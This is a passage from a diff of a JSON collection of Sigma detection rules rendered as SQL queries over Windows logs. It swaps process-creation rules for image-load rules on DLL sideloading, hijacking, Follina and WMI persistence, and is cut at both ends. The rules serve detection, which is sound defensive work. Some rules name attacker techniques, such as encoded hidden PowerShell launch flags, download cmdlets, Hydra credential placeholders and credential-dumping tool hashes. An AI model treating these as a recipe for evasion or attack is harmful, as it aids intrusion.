'%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Network administrator computer" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "status": "experimental", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "status": "experimental", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", + "tags": [ + "attack.t1546.003", + "attack.persistence" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + ], + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "status": "experimental", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE 